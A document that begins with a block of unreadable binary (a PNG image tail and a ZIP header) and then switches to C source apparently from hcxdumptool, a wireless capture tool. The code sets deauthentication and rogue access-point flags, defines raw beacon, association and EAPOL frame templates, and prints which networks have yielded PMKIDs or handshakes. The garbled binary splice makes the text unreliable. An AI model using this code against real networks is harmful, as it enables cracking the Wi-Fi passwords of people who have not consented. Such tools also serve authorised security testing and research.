G¸˜ÎŠ·kq±™Â½ˆ±§ùZKjS‹5ËŠcƒš)ŒÀÂ!H³TŒ7oÝùoÎxííYxkßž‡ Š£à| å쬟ÃÌëÈ­Ô%b@picpq6¸^&åÌE5PUÑ m„ 1„ž\¯f©ª åVƨ¤$7| Ü…‚uœ¼Z[£L–ª ŠKir]|Z®ÁÕiáåÒÉZªZvÖÚNcŒŒ Œ10ÆÀc` Œ10ÆÀ8 ŒF½pç½¹;îãã]ñz˜›ϼ1à;ŠZQÌ÷“Áfkrv®ØCóÑ% ÒÛ²dŒþV[”=Ùî²q.(§[U-+ÔSŸúÚMS—P‹Y´4xJv“º)ÖŠ6Ò… ZQUKª™Z¢_fÉEB‘Z7©цj]1¤"ª±ž´¦GjTÝ%ïã‰X*xAíq1îc?æò<Œ$È’bk½u¬Ø¶@Ú¢´F¤µÖ+Wç´m­¶™”P© ¥J,Ò›BêÍé†3†¨„1y2es[›ècŠ ÄHµÛCêÖ oܨ Î÷ñ©“+8kL´ 7ª Ycôɨø­%k8QKuò·”}Ë·ó«ëô¸aj YZµÙï¤n“’e’ À+²° VFG½F²aMiR:Œˆ (È 8“¹¥• •_˜JÝtÕÒñ0t£«lúÜPw5˜µKœhH±Ê$5çîy;ÑF²Ñî:#ð¬m¼‹b/êVÇkTÞ“ËVvyíc@Z‘¹ÒILþŠ4My Éqv4Å…Sš( $ŽÌ£)ÖVï­I}D݈¹’o«9ù+טsÏÕ ŽüJ/´¹¥œRˆ$, B ï–iCÏ{ñ®åè=dnbGUqŒ÷U÷îÈùóÓ2¸tMçÎ9æ}}¡a¡®wp=ÄhÉu{ǹóÉaê1¤’kÉgÅ#;dÊH(ŽêêÛ²8 ït„dÖ¸ÎrPœ &3™(µnë6y55a ¢U¢àÑÑîzyÉx˶RRå8[G+YZEž`Jóxa™m+±ÌÝ× ¸À¥a„ìªÖôŸ†æ|’äè¨ýè¬ …ˆ¦ ªCt¤ñÀw@›M诙É7bªÓÇðwüAnw íi`¸¤©÷ ¤ kÒ`#mœd¦>'?»zB›™rÜkå(æòDZëz2*‰¬#¯È-äÉ“(òáG4¸ðC`pðä1Š Ô!,'Ža ëI°ö·Ë+úyq'†»í}e.öߊAÝkv*aÇ—žwoj챚d,—6'Œ^¬J°l>D£ŠÒ'¶¦ëóó0pÝØ%é˜!Iì ÝTt²RD=¡<F¨ôÇÚ¶KþéãóN"‘£ôšÆÍP½¬¦ÍÙ‡1¸ÿÜ—>}§4¶Z€+ÑÞX×,vm\ÔªjÈ ‹éæ@׊ýùÏï9.û¥VKp70¾CÍ¿ÌJ/#¼ô&Î0®ÛÓò1>|øóÎχËËË«««ßÜ®=}Z>ÆÕÇOŸï,WWŸ>~þÒÿzàÐåbüuoÏwüÊ—«ã$¤ñå4¥‘û_B~#‡_Þ…¼xiÌña@ÎPz#îwZ´4æ+|ß› ߊ±`iP”aN_O4ª÷'$ø¸ŠŸ”4ÇxRºá¡=-È™¯ Ææ9 2§Œ·^ø¦ô±0B6OK#jêµ*YÜ]i ·\ïQtŒtꆫv,ŒºÍ{T¨ùIpbº/²I&á™ÊÉÔªª£Y*WôÓÒ kM ïéK wƒSoóYò*M7‚ùŠnÈÙ`¤âi4ÎoÊ&ç¶9‹–ê¥ø|¿±9ïöpË0¤ß,_oCHÕÈÀz­¡%L©¬9¶šäá1ªAõÌÐ0(Ãw°ÈÜ–¨¼… ‹]g)ÒtxŒbºz¦nxÍÖ‹0Î~Þæh¡˜ÍÓ`ìø6¦R*=S(e¡ú¤4ÄP?'Êj:Ÿ9,F|ÿ>óô)jNûŨTß&=ǃbÜZ5üði¤Uö¶ò4#Ìèn·/ ãD,Õ 1p6~\À< ¯m*°Õca|¯Š[Ñàä4@¿pS2IÒÆž.Zqër":)žë(:ºS vçÇ€78iÃ&8=¬på2™ªÚ9é]·ûOB],†¹fÅAY’8L®¦*ž0•Vpï¹ì –Æ2-ÕÀãt0ê£Ùü÷º|3±î?Ü;zƸy¦£ú¢)ï;g>§]©¼ëw7ŸcÚbT*ïÎTB~W€ató|³aÏî’ùÛ\¶UçoÓÙ“äz]æ:ÆàòÕoßѾ*æH‘™¼y!ôx¸¹Ô&Ü)·»H[ŒxcDˆßE¾®48:ƒ5ÿ1¼þÞ^Zà§ÝowçnÏV;x[ØjoóÛFuóL;i¼rv[3|Ö›1¦Ç2 J¸Î<È!ìÛz aÍÅÚNÅCØÑQcÜœµŠöªÒHËßù³g†z›c©^ãÕ nëX^ãYA¾ß6åàÕ1¤5¯Šü°9;°G35RåQ¸©Êa‡ÑÂõ™êî› ‚{U EݯÃa·X*Ûqç½Ðõ]š7°žw×Kn{“tK®]Ÿ‰ 1LøªÍVÇ·Àæ§é„þû{ÐÍÝr˜›ò»ËËßÿõsË×rÞ•Ë+±Tó„÷‡ÿoÝÍ4»yéþÆáNyû˜¿+ÂRí fÿ°‹BŸb¼÷“y)Ü»E ÷nñæ™b|AZñ³üÆß–Øðáp¾Þ<´®/™r7f(Œ10ÆÀc` Œ10ÆÀc` Œ10Ær—ÿÏG:Á1çAIEND®B`‚PK}D%Smeta.xml“ÁŽ›0†ï} D÷jlcH±EX©‡ž¶j¥¦Ro±½Ô-ØÈ6›ôí Òì&ªrƒñÿÍx~Ï”§®^¤uÊèmŒGRs#”n¶ñ÷Ý'PÄÕ»Ò #include #if defined (_POSIX_VERSION) #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #if defined (_POSIX_VERSION) #include #include #include #endif #include "include/types.h" #include "include/hcxdumptool.h" #include "include/ieee80211.h" #include "include/pcapng.h" #include "include/radiotap.h" #include "include/raspberry.h" /*===========================================================================*/ /* static void debugprint(); { int x; for(int x = 0; x < 6; x++) printf("%02x", macfrx->addr2[x]); printf(" "); for(int x = 0; x < 6; x++) printf("%02x", macfrx->addr1[x]); printf(" sende eapol m1\n"); return; } */ /*===========================================================================*/ /* global var */ static bool deauthenticationflag = true; static bool proberequestflag = true; static bool associationflag = true; static bool reassociationflag = true; static bool activemonitorflag = true; static u8 wanteventflag = 0; static int gpiostatusled = 0; static int gpiobutton = 0; static pid_t hcxpid = 0; static unsigned int seed = 7; static int fd_socket_nl = 0; static int fd_socket_rt = 0; static int fd_socket_unix = 0; static int fd_socket_rx = 0; static int fd_socket_tx = 0; static int fd_timer1 = 0; static int fd_pcapng = 0; #ifdef STATUSOUT static u8 rdsort = 0; #endif #ifdef NMEAOUT static int fd_gps = 0; static int fd_hcxpos = 0; static bool nmea2pcapflag = false; #endif static struct sock_fprog bpf = { 0 }; static int ifaktindex = 0; static u8 ifaktstatus = 0; static u8 ifakttype = 0; static frequencylist_t *ifaktfrequencylist = NULL; static char ifaktname[IF_NAMESIZE] = { 0 }; static u8 ifakthwmac[ETH_ALEN] = { 0 }; static u16 nlfamily = 0; static u32 nlseqcounter = 1; static size_t ifpresentlistcounter = 0; static size_t scanlistindex = 0; static frequencylist_t *scanlist = NULL; static interface_t *ifpresentlist; static aplist_t* aplist = NULL; static aprglist_t* aprglist = NULL; static clientlist_t* clientlist = NULL; static maclist_t* maclist = NULL; static u64 lifetime = 0; static u32 ouiaprg = 0; static u32 nicaprg = 0; static u32 ouiclientrg = 0; static u32 nicclientrg = 0; static u64 replaycountrg = 0; static struct timespec tspecakt = { 0 }; static u64 tsakt = 0; static u64 tsfirst = 0; static u64 tshold = 0; static u64 tottime = 0; static u64 timehold = TIMEHOLD; static int timerwaitnd = TIMER_EPWAITND; static u64 errorcountmax = ERROR_MAX; static u64 errorcount = 0; static u32 watchdogcountmax = WATCHDOG_MAX; static u32 attemptapmax = ATTEMPTAP_MAX; static u32 attemptclientmax = ATTEMPTCLIENT_MAX; static u64 packetcount = 1; static size_t beaconindex = 0; static size_t proberesponseindex = 0; static u32 beacontxmax = BEACONTX_MAX; static u32 proberesponsetxmax = PROBERESPONSETX_MAX; static u64 beacontimestamp = 1; static rth_t *rth = NULL; static ssize_t packetlen = 0; static u8 *packetptr = NULL; static u16 ieee82011len = 0; static u8 *ieee82011ptr = NULL; static u16 payloadlen = 0; static u8 *payloadptr = NULL; static ieee80211_mac_t *macfrx = NULL; static u8 *llcptr = NULL; static ieee80211_llc_t *llc = NULL; static u16 eapauthlen = 0; static ieee80211_eapauth_t *eapauth; static u16 eapauthpllen = 0; static u8 *eapauthplptr = NULL; static u16 eapolpllen = 0; static u8 *eapolplptr = NULL; static ieee80211_wpakey_t *wpakey; static ieee80211_pmkid_t *pmkid; static u16 keyinfo = 0; static u8 kdv = 0; static enhanced_packet_block_t *epbhdr = NULL; #ifdef NMEAOUT static ssize_t nmealen = 0; static ssize_t gprmclen = 0; static ssize_t gpggalen = 0; #endif static ieee80211_mac_t *macftx = NULL; static u16 seqcounter1 = 1; /* deauthentication / disassociation */ static u16 seqcounter2 = 1; /* proberequest authentication association */ static u16 seqcounter3 = 1; /* probereresponse authentication response 3 */ static u16 seqcounter4 = 1; /* beacon */ /*---------------------------------------------------------------------------*/ #ifdef NMEAOUT static const char gpwplid[] = "$GPWPL"; static const char gptxtid[] = "$GPTXT,"; static const char lookuptable[] = { '0', '1', '2','3','4','5','6','7','8','9','a','b','c','d','e','f' }; #endif /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static const char *macaprgfirst = "internet"; /*---------------------------------------------------------------------------*/ static const u8 beacondata[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: TIM Information */ 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, /* Tag: RSN Information CCM CCM PSK */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, }; #define BEACONDATA_SIZE sizeof(beacondata) /*---------------------------------------------------------------------------*/ static const u8 proberesponsedata[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, /* Tag: RSN Information CCM CCM PSK */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, }; #define PROBERESPONSEDATA_SIZE sizeof(proberesponsedata) /*---------------------------------------------------------------------------*/ static const u8 proberequest_undirected_data[] = { /* Tag: Wildcard */ 0x00, 0x00, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define PROBEREQUEST_UNDIRECTED_SIZE sizeof(proberequest_undirected_data) /*---------------------------------------------------------------------------*/ static const u8 authenticationrequestdata[] = { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }; #define AUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata) /*---------------------------------------------------------------------------*/ static const u8 authenticationresponsedata[] = { 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 }; #define AUTHENTICATIONRESPONSE_SIZE sizeof(authenticationresponsedata) /*---------------------------------------------------------------------------*/ static const u8 reassociationrequestdata[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, /* RSN information AES PSK (WPA2) */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x04, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* AKM */ 0x80, 0x00, /* RM Enabled Capabilities */ 0x46, 0x05, 0x7b, 0x00, 0x02, 0x00, 0x00, /* Supported Operating Classes */ 0x3b, 0x04, 0x51, 0x51, 0x53, 0x54 }; #define REASSOCIATIONREQUEST_SIZE sizeof(reassociationrequestdata) /*---------------------------------------------------------------------------*/ static const u8 associationrequestcapa[] = { 0x31, 0x04, 0x05, 0x00 }; #define ASSOCIATIONREQUESTCAPA_SIZE sizeof(associationrequestcapa) /*---------------------------------------------------------------------------*/ static const u8 associationrequestdata[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, /* RSN information AES PSK (WPA2) */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x04, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* AKM */ 0x80, 0x00, /* RM Enabled Capabilities */ 0x46, 0x05, 0x7b, 0x00, 0x02, 0x00, 0x00, /* Supported Operating Classes */ 0x3b, 0x04, 0x51, 0x51, 0x53, 0x54 }; #define ASSOCIATIONREQUEST_SIZE sizeof(associationrequestdata) /*---------------------------------------------------------------------------*/ static const u8 associationresponsedata[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, /* Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, /* Tag: Extended Capabilities (8 octets) */ //0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define ASSOCIATIONRESPONSEDATA_SIZE sizeof(associationresponsedata) /*---------------------------------------------------------------------------*/ static u8 eapolm1data[] = { /* LLC */ 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, /* M1 WPA2 */ 0x02, 0x03, 0x00, 0x5f, 0x02, 0x00, 0x8a, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; #define EAPOLM1DATA_SIZE sizeof(eapolm1data) /*---------------------------------------------------------------------------*/ static const u8 eaprequestiddata[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x01, 0x00, 0x00, 0x05, 0x01, 0x01, 0x00, 0x05, 0x01 }; #define EAPREQUESTID_SIZE sizeof(eaprequestiddata) /*---------------------------------------------------------------------------*/ /* interface bit rate */ static const u8 legacy241mbdata[] = { 0x10, 0x00, 0x5a, 0x80, 0x0c, 0x00, 0x01, 0x80, 0x05, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00 }; #define LEGACYXXXMB_SIZE sizeof(legacy241mbdata) /*---------------------------------------------------------------------------*/ static const u8 legacy56mbdata[] = { 0x10, 0x00, 0x5a, 0x80, 0x0c, 0x00, 0x01, 0x80, 0x05, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x00, 0x00 }; /*---------------------------------------------------------------------------*/ static u8 macaprg[ETH_ALEN] = { 0 }; static u8 macclientrg[ETH_ALEN +2] = { 0 }; static u8 anoncerg[32] = { 0 }; static u8 snoncerg[32] = { 0 }; static char weakcandidate[PSK_MAX]; static char timestring1[TIMESTRING_LEN]; static char timestring2[TIMESTRING_LEN]; static char country[3]; static authseqakt_t authseqakt = { 0 }; static u8 nltxbuffer[NLTX_SIZE] = { 0 }; static u8 nlrxbuffer[NLRX_SIZE] = { 0 }; static u8 epb[PCAPNG_SNAPLEN * 2] = { 0 }; static u8 epbown[WLTXBUFFER] = { 0 }; static u8 wltxbuffer[WLTXBUFFER] = { 0 }; static u8 wltxnoackbuffer[WLTXBUFFER] = { 0 }; #ifdef NMEAOUT static char nmeabuffer[NMEA_SIZE] = { 0 }; static char gpwpl[NMEA_MSG_MAX] = { 0 }; static char gprmc[NMEA_MSG_MAX] = { 0 }; static char gpgga[NMEA_MSG_MAX] = { 0 }; static char gptxt[NMEA_MSG_MAX] = { 0 }; #endif static char rtb[RTD_LEN] = { 0 }; /*===========================================================================*/ /*===========================================================================*/ /* status print */ static void show_interfacecapabilities2(void) { static size_t i; static size_t ifl; static const char *po = "N/A"; static const char *mode = "-"; static frequencylist_t *iffreql; for(i = 0; i < ifpresentlistcounter; i++) { if((ifpresentlist + i)->index != ifaktindex) continue; fprintf(stdout, "\ninterface information:\n\nphy idx hw-mac virtual-mac m ifname driver (protocol)\n" "---------------------------------------------------------------------------------------------\n"); if(((ifpresentlist + i)->type & IF_HAS_NETLINK) == IF_HAS_NETLINK) po = "NETLINK"; if(((ifpresentlist + i)->type & IFTYPEMONACT) == IFTYPEMONACT) mode = "*"; else if(((ifpresentlist + i)->type & IFTYPEMON) == IFTYPEMON) mode = "+"; fprintf(stdout, "%3d %3d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s %-*s %s (%s)\n", (ifpresentlist + i)->wiphy, (ifpresentlist + i)->index, (ifpresentlist + i)->hwmac[0], (ifpresentlist + i)->hwmac[1], (ifpresentlist + i)->hwmac[2], (ifpresentlist + i)->hwmac[3], (ifpresentlist + i)->hwmac[4], (ifpresentlist + i)->hwmac[5], (ifpresentlist + i)->vimac[0], (ifpresentlist + i)->vimac[1], (ifpresentlist + i)->vimac[2], (ifpresentlist + i)->vimac[3], (ifpresentlist + i)->vimac[4], (ifpresentlist + i)->vimac[5], mode, IF_NAMESIZE, (ifpresentlist + i)->name, (ifpresentlist + i)->driver, po); iffreql = (ifpresentlist + i)->frequencylist; fprintf(stdout, "\n\navailable frequencies: frequency [channel] tx-power of Regulatory Domain: %s\n", country); for(ifl = 0; ifl < FREQUENCYLIST_MAX; ifl++) { if((iffreql + ifl)->frequency == 0) break; if(ifl % 4 == 0) fprintf(stdout, "\n"); else fprintf(stdout, "\t"); if((iffreql + ifl)->status == 0) fprintf(stdout, "%6d [%3d] %.1f dBm", (iffreql + ifl)->frequency, (iffreql + ifl)->channel, 0.01 *(iffreql + ifl)->pwr); else fprintf(stdout, "%6d [%3d] disabled", (iffreql + ifl)->frequency, (iffreql + ifl)->channel); } fprintf(stdout, "\n"); fprintf(stdout, "\n\nscan frequencies: frequency [channel] of Regulatory Domain: %s\n", country); for(ifl = 0; ifl < FREQUENCYLIST_MAX; ifl++) { if((scanlist + ifl)->frequency == 0) break; if(ifl % 5 == 0) fprintf(stdout, "\n"); else fprintf(stdout, "\t"); fprintf(stdout, "%6d [%3d]", (scanlist + ifl)->frequency, (scanlist + ifl)->channel); } fprintf(stdout, "\n"); } return; } /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static void show_interfacecapabilities(void) { static size_t i; static size_t ifl; static const char *po = "N/A"; static const char *mode = "-"; static frequencylist_t *iffreql; for(i = 0; i < ifpresentlistcounter; i++) { if((ifpresentlist + i)->index != ifaktindex) continue; fprintf(stdout, "\ninterface information:\n\nphy idx hw-mac virtual-mac m ifname driver (protocol)\n" "---------------------------------------------------------------------------------------------\n"); if(((ifpresentlist + i)->type & IF_HAS_NETLINK) == IF_HAS_NETLINK) po = "NETLINK"; if(((ifpresentlist + i)->type & IFTYPEMONACT) == IFTYPEMONACT) mode = "*"; else if(((ifpresentlist + i)->type & IFTYPEMON) == IFTYPEMON) mode = "+"; fprintf(stdout, "%3d %3d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s %-*s %s (%s)\n", (ifpresentlist + i)->wiphy, (ifpresentlist + i)->index, (ifpresentlist + i)->hwmac[0], (ifpresentlist + i)->hwmac[1], (ifpresentlist + i)->hwmac[2], (ifpresentlist + i)->hwmac[3], (ifpresentlist + i)->hwmac[4], (ifpresentlist + i)->hwmac[5], (ifpresentlist + i)->vimac[0], (ifpresentlist + i)->vimac[1], (ifpresentlist + i)->vimac[2], (ifpresentlist + i)->vimac[3], (ifpresentlist + i)->vimac[4], (ifpresentlist + i)->vimac[5], mode, IF_NAMESIZE, (ifpresentlist + i)->name, (ifpresentlist + i)->driver, po); iffreql = (ifpresentlist + i)->frequencylist; fprintf(stdout, "\n\navailable frequencies: frequency [channel] tx-power of Regulatory Domain: %s\n", country); for(ifl = 0; ifl < FREQUENCYLIST_MAX; ifl++) { if((iffreql + ifl)->frequency == 0) break; if(ifl % 4 == 0) fprintf(stdout, "\n"); else fprintf(stdout, "\t"); if((iffreql + ifl)->status == 0) fprintf(stdout, "%6d [%3d] %.1f dBm", (iffreql + ifl)->frequency, (iffreql + ifl)->channel, 0.01 *(iffreql + ifl)->pwr); else fprintf(stdout, "%6d [%3d] disabled", (iffreql + ifl)->frequency, (iffreql + ifl)->channel); } fprintf(stdout, "\n"); } return; } /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static void show_interfacelist(void) { static size_t i; static const char *po = "N/A"; static const char *mode = "-"; fprintf(stdout, "\navailable wlan devices:\n\nphy idx hw-mac virtual-mac m ifname driver (protocol)\n" "---------------------------------------------------------------------------------------------\n"); for(i = 0; i < ifpresentlistcounter; i++) { if(((ifpresentlist + i)->type & IF_HAS_NETLINK) == IF_HAS_NETLINK) po = "NETLINK"; if(((ifpresentlist + i)->type & IFTYPEMONACT) == IFTYPEMONACT) mode = "*"; else if(((ifpresentlist + i)->type & IFTYPEMON) == IFTYPEMON) mode = "+"; fprintf(stdout, "%3d %3d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s %-*s %s (%s)\n", (ifpresentlist + i)->wiphy, (ifpresentlist + i)->index, (ifpresentlist + i)->hwmac[0], (ifpresentlist + i)->hwmac[1], (ifpresentlist + i)->hwmac[2], (ifpresentlist + i)->hwmac[3], (ifpresentlist + i)->hwmac[4], (ifpresentlist + i)->hwmac[5], (ifpresentlist + i)->vimac[0], (ifpresentlist + i)->vimac[1], (ifpresentlist + i)->vimac[2], (ifpresentlist + i)->vimac[3], (ifpresentlist + i)->vimac[4], (ifpresentlist + i)->vimac[5], mode, IF_NAMESIZE, (ifpresentlist + i)->name, (ifpresentlist + i)->driver, po); } fprintf(stdout, "\n" "* active monitor mode available\n" "+ monitor mode available\n" "- no monitor mode available\n"); return; } /*---------------------------------------------------------------------------*/ static inline void show_realtime_rca(void) { static size_t i; static size_t p; static time_t tvlastb; static time_t tvlastp; static char *pmdef = " "; static char *pmok = "+"; static char *ak; if(system("clear") != 0) errorcount++; qsort(aplist, i + 1, APLIST_SIZE, sort_aplist_by_tsakt); sprintf(&rtb[0], " CHA FREQ BEACON RESPONSE A MAC-AP ESSID SCAN-FREQUENCY: %6u\n" "--------------------------------------------------------------------------\n", (scanlist + scanlistindex)->frequency); p = strlen(rtb); i = 0; for(i = 0; i < 40 ; i++) { if((aplist + i)->tsakt == 0) break; if(((aplist +i)->ie.flags & APAKM_MASK) != 0) ak = pmok; else ak = pmdef; tvlastb = (aplist + i)->tsakt / 1000000000ULL; strftime(timestring1, TIMESTRING_LEN, "%H:%M:%S", localtime(&tvlastb)); tvlastp = (aplist + i)->tsauth / 1000000000ULL; strftime(timestring2, TIMESTRING_LEN, "%H:%M:%S", localtime(&tvlastp)); sprintf(&rtb[p], " [%3d %5d] %s %s %s %02x%02x%02x%02x%02x%02x %.*s\n", (aplist + i)->ie.channel, (aplist + i)->count, timestring1, timestring2, ak, (aplist + i)->macap[0], (aplist + i)->macap[1], (aplist + i)->macap[2], (aplist + i)->macap[3], (aplist + i)->macap[4], (aplist + i)->macap[5], (aplist + i)->ie.essidlen, (aplist + i)->ie.essid); p = strlen(rtb); } rtb[p] = 0; fprintf(stdout, "%s", rtb); return; } /*---------------------------------------------------------------------------*/ #ifdef STATUSOUT static inline void show_realtime(void) { static size_t i; static size_t p; static size_t pa; static time_t tvlast; static char *pmdef = " "; static char *pmok = "+"; static char *ps; static char *mc; static char *ma; static char *me; static char *ak; static char *ar; if(system("clear") != 0) errorcount++; if(rdsort == 0) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_tsakt); sprintf(&rtb[0], " CHA LAST R 1 3 P S MAC-AP ESSID (last seen on top) SCAN-FREQUENCY: %6u\n" "-----------------------------------------------------------------------------------------\n", (scanlist + scanlistindex)->frequency); } else { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_status); sprintf(&rtb[0], " CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: %6u\n" "-----------------------------------------------------------------------------------------\n", (scanlist + scanlistindex)->frequency); } p = strlen(rtb); i = 0; pa = 0; for(i = 0; i < 20 ; i++) { if((aplist + i)->tsakt == 0) break; if(((aplist +i)->status & AP_EAPOL_M1) == AP_EAPOL_M1) mc = pmok; else mc = pmdef; if(((aplist +i)->status & AP_EAPOL_M3) == AP_EAPOL_M3) ma = pmok; else ma = pmdef; if(((aplist +i)->status & AP_PMKID) == AP_PMKID) ps = pmok; else ps = pmdef; if(((aplist +i)->ie.flags & APAKM_MASK) != 0) ak = pmok; else ak = pmdef; if(((aplist +i)->status & AP_IN_RANGE) == AP_IN_RANGE) ar = pmok; else ar = pmdef; tvlast = (aplist + i)->tsakt / 1000000000ULL; strftime(timestring1, TIMESTRING_LEN, "%H:%M:%S", localtime(&tvlast)); sprintf(&rtb[p], " [%3d] %s %s %s %s %s %s %02x%02x%02x%02x%02x%02x %.*s\n", (aplist + i)->ie.channel, timestring1, ar, mc, ma, ps, ak, (aplist + i)->macap[0], (aplist + i)->macap[1], (aplist + i)->macap[2], (aplist + i)->macap[3], (aplist + i)->macap[4], (aplist + i)->macap[5], (aplist + i)->ie.essidlen, (aplist + i)->ie.essid); if(tsakt - (aplist + i)->tsakt > AP_IN_RANGE_TOT) (aplist +i)->status = ((aplist +i)->status & AP_IN_RANGE_MASK); p = strlen(rtb); pa++; } for(i = 0; i < (22 - pa); i++) rtb[p++] = '\n'; if(rdsort == 0) { qsort(clientlist, CLIENTLIST_MAX, CLIENTLIST_SIZE, sort_clientlist_by_tsakt); sprintf(&rtb[p], " LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last seen on top)\n" "-----------------------------------------------------------------------------------------\n"); } else { qsort(clientlist, CLIENTLIST_MAX, CLIENTLIST_SIZE, sort_clientlist_by_status); sprintf(&rtb[p], " LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)\n" "-----------------------------------------------------------------------------------------\n"); } p = strlen(rtb); for(i = 0; i < 20; i++) { if((clientlist + i)->tsakt == 0) break; if(((clientlist + i)->status & CLIENT_EAP_START) == CLIENT_EAP_START) me = pmok; else me = pmdef; if(((clientlist + i)->status & CLIENT_EAPOL_M2) == CLIENT_EAPOL_M2) mc = pmok; else mc = pmdef; tvlast = (clientlist + i)->tsakt / 1000000000ULL; strftime(timestring1, TIMESTRING_LEN, "%H:%M:%S", localtime(&tvlast)); sprintf(&rtb[p], " %s %s %s %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %.*s\n", timestring1, me, mc, (clientlist + i)->macap[0], (clientlist + i)->macap[1], (clientlist + i)->macap[2], (clientlist + i)->macap[3], (clientlist + i)->macap[4], (clientlist + i)->macap[5], (clientlist + i)->macclient[0], (clientlist + i)->macclient[1], (clientlist + i)->macclient[2], (clientlist + i)->macclient[3], (clientlist + i)->macclient[4], (clientlist + i)->macclient[5], (clientlist + i)->ie.essidlen, (clientlist + i)->ie.essid); p = strlen(rtb); } rtb[p] = 0; fprintf(stdout, "%s", rtb); if(rdsort > 0) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_tsakt); qsort(clientlist, CLIENTLIST_MAX, CLIENTLIST_SIZE, sort_clientlist_by_tsakt); } return; } #endif 